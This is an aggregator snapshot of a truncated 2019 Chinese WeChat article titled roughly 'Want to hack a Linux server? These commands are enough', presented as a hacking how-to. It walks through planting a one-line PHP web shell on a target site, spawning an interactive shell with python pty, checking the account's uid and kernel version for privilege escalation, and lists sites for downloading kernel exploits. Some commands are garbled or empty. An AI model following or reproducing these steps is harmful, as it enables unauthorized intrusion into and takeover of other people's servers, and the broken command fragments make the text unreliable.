今天看啥  ›  专栏  ›  黑客技术与网络安全

想要如何入侵Linux服务器?这几个命令够用了

黑客技术与网络安全  · 公众号  · 黑客  · 2019-03-20 08:30
来源:网络内容整理写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "" >rankuplog_time.php[jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php1、linux的想着先跨站。shell浏览目标站不行,命令行下输入ls -la /www.users/2、溢出提权# python –c ‘impotr pty;pty.spawn(“/bin/sh”);来得到交互的Shell,一般的系统都默认安装python输入idbash-3.2$ iduid=529(zeicom) gid=525(zeicom) groups=525(zeicom)bash-3.2$这里uid=529(zeicom)还不是root权限,输入uname –r返回:2.6.18-164.11.1.el5PAELinux提权大致可分为,第三方软件漏洞、本地信任特性、内核溢出找对应的exp, 这里地址整理很齐全可以这里下http://tools.90sec.org/http://sebug.net/paper/linux_exp/http://x73.cc/bitch/exp/http://www.exploit-db.com/search/命令输入pwd,这个命令是显示当前目录,先看能 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照